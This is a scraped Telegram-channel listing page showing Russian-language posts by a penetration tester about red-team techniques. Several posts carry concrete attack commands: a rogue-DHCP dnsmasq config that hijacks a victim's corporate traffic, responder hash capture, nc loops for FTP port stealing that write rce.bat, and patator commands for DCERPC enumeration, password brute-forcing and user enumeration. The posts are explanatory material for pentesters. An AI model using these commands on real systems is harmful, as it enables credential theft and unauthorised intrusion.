Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

Паглядзець

Николаевский Ванёк

Паглядзець

Мир сегодня с "Юрий Подоляка"

Паглядзець

Труха⚡️Україна

Паглядзець

Николаевский Ванёк

Паглядзець

s0i37_channel

Рэйтынг TGlist

ТыпПублічны

Вертыфікацыя

Не вертыфікаваны

Надзейнасць

Не надзейны

Размяшчэнне

МоваІншая

Дата стварэння каналаSep 19, 2022

Дадана ў TGlist

Feb 06, 2025

Я ўладальнік канала

Гісторыя змяненняў

Прыкрепленая група

s0i37_channel [chat]

Статыстыка Тэлеграм-канала s0i37_channel

Падрабязней

Падпісчыкаў

3 275

24 гадз.00%Тыдзень

391.2%Месяц

1595.1%

Індэкс цытавання

0

Згадкі0Рэпостаў на каналах0Згадкі на каналах0

Сярэдняе ахоп 1 паста

1 242

12 гадз.9850%24 гадз.1 2420%48 гадз.1 3690%

Узаемадзеянне (ER)

6.2%

Рэпостаў52Каментары0Рэакцыі25

Узаемадзеянне па ахопу (ERR)

0%

24 гадз.0%Тыдзень

0.28%Месяц

4.02%

Ахоп 1 рэкламнага паста

1 242

1 гадз.5 311427.62%1 – 4 гадз.00%4 - 24 гадз.00%

Падрабязней

Падключыце нашага бота да канала і даведайцеся пол аўдыторыі гэтага канала.

Усяго пастоў за 24 гадзіны

0

Дынаміка

Апошнія публікацыі ў групе "s0i37_channel"

Усе пасты

31.03.202512:53

Второй, куда менее очевидный момент, который упускают автоматизаторы - это vhostы (когда на одном порту может быть сразу множество сайтов). И, важный момент, - ни кто не гарантирует, что будет связь между DNS и заголовком Host. Иногда админы убирают старые сайты удаляя просто DNS-запись, забывая при этом удалить сам сайт. И такая простая pipeline автоматизация как subfinder | httpx | katana уже не заметит такие сайты.
Искать фактические сайты на веб-серверах можно ffuf или gobuster (особенно после моего коммита https://github.com/OJ/gobuster/pull/249). И далее добавлять соответствие ip hostname в /etc/hosts. Но если говорить об автоматизации с этим подходом возникают сложности - при одновременном сканировании сразу множества сайтов (а на периметре их обычно десятки, сотни) наши скрипты будут мешать друг другу используя при этом единый файл hosts. Решение тут - это Linux namespace, позволяющий запустить любой процесс с персональными точками монтирования. И вот таким волшебным sheebang (https://piware.de/2012/12/running-a-script-with-unshared-mount-namespace/) в любом скрипте автоматизации #!/usr/bin/env -S sudo unshare -m sudo -u user bash мы можем запускать проверки внося изменения в hosts локально, не мешая другим скриптам. После чего автоматизация не пройдёт мимо даже скрытого (без dns) сайта.

24.03.202513:05

Анализ ACL (прав доступа) в Active Directory не такая простая задача и руками обычно не реализуется. Для злоумышленника она зачастую даёт хитрую неочевидную тропку до доменного админа.
Bloodhound, которым обычно проводят такой анализ, фиксирует лишь те ACE что понимает и что представляет угрозу. Но как увидеть полную картину и получить для анализа абсолютно все ACE? Задача усложняется ещё и тем что DACL имеет достаточно не удобный бинарный формат, затрудняющий его свободный анализ. Тот же bloodhound и impacket анализирует его лишь побитовым сравнением масок и флагов, не давая реальной возможности анализировать ACL самостоятельно и видеть больше чем позволено BH. Вот если бы бинарные ACE можно было превратить в текстовый канонический и greppable формат, что бы все мисконфиги было видно даже невооружённым взглядом.

Пару лет назад я заметил, что только в библиотеке skelsec/winacl есть функционал для полного декодирования ACE в канонический понятный вид. В итоге я сделал pull request в winacl (https://github.com/skelsec/winacl/pull/8) и в ldap шелл msldap (https://github.com/skelsec/msldap/pull/28), в котором теперь можно запрашивать ACL и выводить их в понятной и greppable форме для произвольных объектов.

Так на одном из недавних Red team инструмент msldap сильно помог в выявлении уязвимых прав доступа к шаблону сертификата ADCS, оставаясь при этом ниже радаров SOC и тихом захвате инфраструктуры через ESC4.

03.02.202514:23

Однажды в голову мне пришла идея разработать немного-немало свой собственный google. Чтоб его можно было запустить в локальной сети и отыскать там любые секреты где нибудь в глубине публичных сетевых дисков, ftp или вебе. И что бы такая система понимала не только текстовые файлы, но и офисные документы, архивы, исполняемые файлы, картинки, звук, словом всё что только может прийти в голову и что нельзя искать простым текстовым поиском.
Интернет сегодня нельзя представить без поисковика, но почему в локальной сети иная картина? Ведь как известно общедоступные ресурсы это вечная головная боль всех админов, а для пентестеров их анализ слишком дорогостоящая по времени работа.
Разработать в одиночку и за умеренное время собственный аналог google непростая задача. К решению данной проблемы я пытался подойти с разных сторон и за всё время два или три раза полностью переписывал всю систему с нуля. Но в итоге мне удалось найти очень простое и элегантное решение, почти не требующее кодинг - создать систему построенную из готовых компонентов (GNU), легко масштабируемую и также легко внедряемую (docker). Да ещё и понимающую google дорки (opensearch).
Такая система может быть одинаково полезна как пентестерам когда перед тобой сотни шар, так и защитникам - ведь систему можно настроить на непрерывный регулярный краулинг всех общедоступных ресурсов.
В статье https://habr.com/ru/companies/ussc/articles/878340/ я детально описываю идею моей системы, её несложную логику работы а так же настройку и примеры использования.

31.01.202509:46

Рубрика hardware - превращаем обычный ноутбук в cyberdesk.
Отличные доп мониторы для ноутбука - laptomo (ссылку не прикладываю, тк не реклама). Каждый монитор имеет независимое подключение либо typeC-hdmi либо typeC-typeC. Питание usbA-usbC. При этом есть поддержка сквозной передачи питания typeC от монитора в ноутбук на тот случай если в ноутбуке только один typeC. Комплектация включает в себя все необходимые провода. Размер и вес как у ноутбука.
Идеально для 14". И отличная вещь в командировках и внутренних пентестах.👍

24.01.202512:49

В результате корпоративный проводной трафик пойдёт на нас (возможно даже на улицу, если мы хакер с roqueAP). А если мы перекрыли маршруты до DC и корп ресурсов со сквозной аутентификацией, то очень скоро нам полетят NetNTLM-хэши корп учетки (iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-ports 445 + responder).
Это единственный способ когда скоуп перехвата трафика может выйти за пределы одного сетевого интерфейса и ещё один пример красивой атаки karma на неприметных клиентов.
Так что не забывайте отключать WiFi если не пользуетесь им.

24.01.202512:49

Как дотянуться до корпоративного трафика с улицы через обычный ноутбук?
Существует способ позволяющий перехватить трафик одного интерфейса через другой, скажем проводного подключения через WiFi.
Если нам удалось удаленно подключить корпоративный ноут к себе по WiFi (karma, known_beacons) то в этот момент мы можем перехватить его корп трафик идущий по проводу! Стандартным поведением при подключении к сети почти всегда является dhcp, который как известно может влиять на сетевые настройки. Так что в момент подключения клиента мы можем по dhcp перекрыть ему роутинг всех сетевых интерфейсов с помощью разбиения default маршрута. Сделать это можно даже обычным sudo dnsmasq --conf-file=dnsmasq.conf -d -p0 и таким конфигом:

domain=fake.net
interface=wlan0
dhcp-range=11.0.0.10,11.0.0.20,24h
dhcp-option=1,255.255.255.0
dhcp-option=3,11.0.0.1
dhcp-option=6,11.0.0.1
dhcp-option=121,0.0.0.0/1,11.0.0.1,128.0.0.0/1,11.0.0.1
dhcp-option=249,0.0.0.0/1,11.0.0.1,128.0.0.0/1,11.0.0.1

В последних двух строчках как раз и происходит вся магия, которая перетянет eth-трафик жертвы на wifi атакующего.

17.01.202509:57

А теперь как добиться того же эффекта когда у нас туннель. Тут все ещё проще. Раз мы имеем дело с туннелями (L3 уровень), то управлять ими нужно через маршруты. Сперва мы создаем новую таблицу с маршрутом в нужный нам туннель ip r a default dev tun0 table 1194. Далее опять с помощью iptables мы помечаем все пакеты определенной группы iptables -t mangle -A OUTPUT -m owner --gid-owner 1194 -j MARK --set-mark 0x1194. И после связываем их с маршрутом правилом - ip rule add fwmark 0x1194/0x1194 lookup 1194. Теперь достаточно лишь сменить в консоли текущую группу (newgrp tun) и все дальнейшие подключения пойдут в нужный нам туннель.
В итоге такой подход позволяет нам эффективно использовать множество туннелей в одно время, не мешая друг другу и не нарушая при этом дефолтную маршрутизацию.

17.01.202509:57

Но как сделать это максимально удобным?
С помощью iptables и модуля owner мы можем применить правила ещё и к конкретной пользовательской группе iptables -t nat -A OUTPUT -m owner --gid-owner 3128 -p tcp -j REDIRECT --to-ports 12345.
Далее нам нужно лишь сменить текущую группу в консоли (командой newgrp proxy) и весь трафик в этой сессии от любого приложения пойдёт в нужный нам прокси.

17.01.202509:57

Как повелевать своим трафиком при пентесте. При пентесте как правило мы имеем дело либо с прокси (уровень L4) либо с туннелями (уровень L3).
Как справиться с прокси. В Linux есть замечательный механизм позволяющий восстановить исходный IP-адрес после редиректа (getsockopt(socket.SOL_IP)). Именно так и работает прозрачное проксирование. Оно позволяет заворачивать трафик любого (даже go и kernel) приложения куда мы захотим. С точки зрения системы этот процесс более естественный чем соксификация. Ведь для этого нам не нужно перехватывать библиотечные вызовы, а достаточно поймать уже отправленные пакеты iptables -t nat -A OUTPUT -p 80 -j REDIRECT --to-ports 12345 и направить их в нужный листенер (например redsocks). И уже redsocks в дальнейшем спроксирует подключения в socks или http прокси.

18.10.202408:34

Что бы не открывать лишние порты на FTP-серверах админы могут пойти вот на что. Для наведения порядка в сетевых портах они могут настроить FTP-службу на использование в passive mode более узкого диапазона портов вплоть до одного порта, который точечно пробрасывается с DMZ на FTP-сервер. И если для проброса используется прокси или форвадр с SNAT - то такой сервер окажется сильно уязвим.

Всякий раз встретив FTP мы должны попробовать поискать его data-порт среди всех 65к портов. При нормальных условиях data-порты открываются только в момент подключения клиентов и будут практически неуловимы для нас. Но если перед нами постоянно открытый и не меняющийся tcp-порт - возможно это прокси на FTP-data (его nmap -sV должен быть пустой).
Если мы найдем такой data-порт и будем к нему постоянно подключаться while :; do nc -nv target 54321; done то в какой то момент мы начнем получать данные вместо легитимных клиентов (Confidentiality:High). А если писать туда while :; do nc -nv target 54321 < rce.bat; done, то соответственно записывать произвольный контент вместо клиентов (Integrity: High). Ну и всё это время сами клиенты не смогут получать доступ к серверу (Availability: High).

Почему так происходит? Данная атака называется port stealing и была открыта ещё в прошлом тысячелетии. Защита от неё проста - сервер должен сверять IP.src. Но если перед FTP-сервером с DMZ происходит проксирование/форвард, с подменой IP.src, тогда FTP-служба видит всех клиентов как один IP и начинает путаться в сокетах, руководствуясь лишь временем подключения.
Получается некий FTP Smuggling. Эту давно забытую уязвимость мы обнаружили на одном из проектов вместе с @levatein.

09.10.202408:13

Почти всегда при пентесте внешнего периметра можно встретить FTP-сервер. Протокол FTP имеет особенность - данные он передает через другой порт, как правило случайный. И для хакера от сюда следует две вещи.
Тк FTP для данных открывает случайный порт из верхнего динамического диапазона, то часто c DMZ пробрасывают почти весь динамический диапазон портов. Куда входит и DCERPC (49152,..). Всё что доступно через MSRPC пайпы на 99% доступно и через DCERPC-транспорт. А это значит, что на этих портах можно найти и OpenSCManagerW (services.py, smbexec.py, psexec.py), и SchRpcRegisterTask/SchRpcRun/SchRpcGetLastRunInfo (atexec.py) интерфейсы и подбирать к ним пароль. В случае успеха - RCE и захват сервера, в случае неудачи - DCERPC как минимум в своём negotiation разглашает имя домена и машины.
Специально для этого я сделал pull request в patator и теперь с помощью него можно раскручивать DCERPC.
Утилиты ifmap.py, rpcmap.py и auxiliary/scanner/dcerpc/management иногда могут возвращать rpc_s_access_denied, но это не предел, и тут мы можем применить patator.py:

patator.py dcom_login host=10.0.0.15 port=49152 uuid=FILE0 0=/tmp/uuids.txt ver=FILE1 1=/tmp/vers.txt -t 1 -x ignore:code=-1

- получаем список UUID без аутентификации.
Можем сразу посмотреть, на каком порту висит "перспективный" интерфейс:

patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=367abb81-9844-35f1-ad32-98f038001003 ver=2.0 -t 1 -x ignore:code=-1

- где MS-SCMR (smbexec.py)

patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=86d35949-83c9-4044-b424-db363231fd0c ver=1.0 -t 1 -x ignore:code=-1

- где MS-TSCH (atexec.py)

patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=12345678-1234-abcd-ef00-0123456789ab ver=1.0 -t 1 -x ignore:code=-1

- где MS-RPRN (printerbug)

patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=c681d488-d850-11d0-8c52-00c04fd90f7e ver=1.0 -t 1 -x ignore:code=-1

- где MS-EFSR (petitpotam)
и т.д.
В отличие от MSRPC, DCERPC как транспорт сам по себе не требует аутентификации и недоступные по MSRPC функции могут быть доступны по DCERPC. Поэтому на каждом порту и каждом интерфейсе можно проверить наличие анонимного доступа к каждой RPC-функции вызывая её opnum по-очереди:

patator.py dcom_login host=10.0.0.15 port=49158 uuid=12345778-1234-ABCD-EF00-0123456789AB ver=0.0 opnum=FILE0 0=/tmp/opnums.txt -t 1 -x ignore:mesg=rpc_s_access_denied

- везде где вернулся rpc_x_bad_stub_data или success означает возможность вызвать RPC анонимно
Пример анонимного вызова IObjectExporter::ServerAlive2(), той самой что возвращает список сетевых интерфейсов:
patator.py dcom_login host=10.0.0.15 port=135 uuid=99fcfec4-5260-101b-bbcb-00aa0021347a ver=0.0 opnum=5
И наконец сам брутфорс мы можем делать на любом интерфейсе, любом tcp-порту:

patator dcom_login host=1.2.3.4 port=49665 uuid=000001A0-0000-0000-C000-000000000046 ver=0.0 user=admin password=FILE0 0=passwords.txt -x quit:mesg=rpc_x_bad_stub_data

И еще. Иногда было замечено, что на DCERPC при аутентификации можно получать разные коды ошибок для существующих и не существующих пользователей. Тоже самое будет справедливо и для доменных учётных записей.

patator dcom_login host=1.2.3.4 port=49665 uuid=000001A0-0000-0000-C000-000000000046 ver=0.0 user=FILE0 password=1 0=logins.txt -x ignore:mesg='Unknown DCE RPC fault status code: 00000721'

Возможность user enumeration ещё сильнее упростит проведение bruteforce атаки.
Вот столько всего можно выжать из безобидно торчащего 49152/tcp порта...

24.09.202411:10

Вчера дал интервью кибермедиа на тему противодействия шодану (https://securitymedia.org/info/shodan-mir-otkrytykh-portov-i-uyazvimykh-ustroystv.html). Когда то давно я уже писал про то как можно испортить сканирование портов.
1. Использовать на фаерволе правило отвечать всем SYN-ACK, тогда перед злоумышленником будет 65к открытых портов. Иногда встречаю такое при сканировании портов - неприятная штука.
2. Ну и если вы хотите в конец испортить жизнь хакерам - перенаправьте все закрытые порты в заглушку, которая шлет какой-нибудь мусор из /dev/zero. Такая техника весит service identification, и в конечном счете исчерпывает память у атакующего.

Усе пасты